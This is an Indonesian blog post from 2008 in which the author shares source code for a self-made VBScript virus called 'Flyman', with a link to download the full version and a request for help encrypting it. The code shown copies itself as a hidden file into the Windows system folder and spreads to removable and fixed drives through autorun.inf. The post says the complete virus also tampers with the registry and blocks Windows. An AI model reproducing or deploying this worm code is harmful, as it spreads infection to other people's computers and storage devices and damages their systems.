Oleh: knowcomputer | Agustus 23, 2008

Membua Virus VBS

Setelah lama, meng”compile” virus ini akhirnya jadi sudah, virus dengan ukuran boncel yaitu cuma 7.915 bytes, terdiri dari 132 baris, saya menggunakan bahasa VBS+Jawa, yang menjadi kelemahannya antara lain tidak di-encrypt coz aq ga tau gimana caranya meng-encrip virus vbs ini. Kalo ada yang tau kasih komenntnya ya. Virus ini bekerja seperti virus2 biasa yaitu membuat autorun dan mengobrak-ngabrik registry windows, tapi virus ini dalam hal mengobrak-ngabrik registry jangan tanya apabila sudah terinfeksi bukan tidak mungkin anda harus merestrart komputer karena tidak adanya shut down, selain itu windows anda terasa mati suri karena semuanya diblok oleh virus ini. Apabila aku menilai virus ini aku nilai 0.0000000000000000000000000000000000000000000000001 tapi karena dibuat oleh anak smp (saat mbuat aq masih smp klas 9) maka aku kasih nilai 0.1 h.i..i…i….i…..i……i…….i………i………i……….

Saya akan melampirkan “bagian depan” source kodenya untuk fullnya anda bisa download di link download.

Ingat!!! Untuk pendidikan. Sekali lagi apabila ada yang tahu untuk meng-encrypt virus ini kasih tahu ke aku

SOURCE CODE FLYMAN.VBS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
on error resume next

‘Aku jenenge: Flyman
on error resume next

‘Dim kata-kata berikut
dim rekur,syspath,windowpath,desades,longka,mf,isi,tf,Flyman,nt,check,sd

’siapkan isi autorun
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe Flyman.sys.vbs”
set longka = createobject(“Scripting.FileSystemObject”)
set mf = longka.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘buat file induk
Set windowpath = longka.getspecialfolder(0)
Set syspath = longka.getspecialfolder(1)
set tf = longka.getfile(syspath & “\shell32.vbs”)
tf.attributes = 32
set tf = longka.createtextfile(syspath & “\shell32.vbs”,2,true)
tf.write rekur
tf.close
set tf = longka.getfile(syspath & “\shell32.vbs”)
tf.attributes = 39

’sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in longka.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then

set tf=longka.getfile(desades.path &”\Flyman.sys.vbs”)
tf.attributes =32
set tf=longka.createtextfile(desades.path &”\Flyman.sys.vbs”,2,true)
tf.write rekur
tf.close
set tf=longka.getfile(desades.path &”\Flyman.sys.vbs”)
tf.attributes = 39

set tf =longka.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = longka.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next

if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(“Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

‘Manipulasi Registry
set Flyman = createobject(“WScript.Shell”)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Source kode diatas sesungguhnya sudah mempunyai kelengkapan bila di bilang virus tetapi tidak memakukan perubahan pada registry.

Area Download

VIrus Flyman.vbs


Tanggapan

  1. mas judule kurang huruf “t” , tolong virus gaweanmu ngrusak komp ora,,

  2. Lebih tepatnya ngobrak ngabrik registry windows


Beri tanggapan

Your response:

Kategori